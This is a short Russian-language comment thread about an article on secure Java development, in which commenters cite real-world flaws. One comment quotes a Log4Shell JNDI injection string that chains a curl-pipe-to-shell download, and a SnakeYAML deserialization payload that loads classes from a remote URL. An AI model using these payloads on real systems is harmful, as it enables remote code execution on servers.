Comments 7
Каждый раз, когда слышу про "безопасную разработку" на Java думаю - что безопасного в методах типизированных коллекций, принимающих Object
А что то из реально джава мира есть ?
log4j - ${jndi:ldap://... например в GET /openAPI?id=${jndi:ldap://.../TomcatBypass/Command/Base64/curl -fsSL ****** sh}
cve-2022-1471 snakeyaml
Тип:не безопасная десериализация
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]
приводит к исполнению:
new ScriptEngineManager(
new URLClassLoader(
new URL[]{
new URL("http://localhost:8080/")
}
)
)
такой себе log4j только использовать сложнее
Форматирование вышло из чата
Хочу вторую часть: "Опасная разработка в Java".
сильно уж за уши притянуто и очень примитивно, из всего перечисленного столкнуться можно разве что с небезопасным обращением к ресурсам.
Безопасная разработка в Java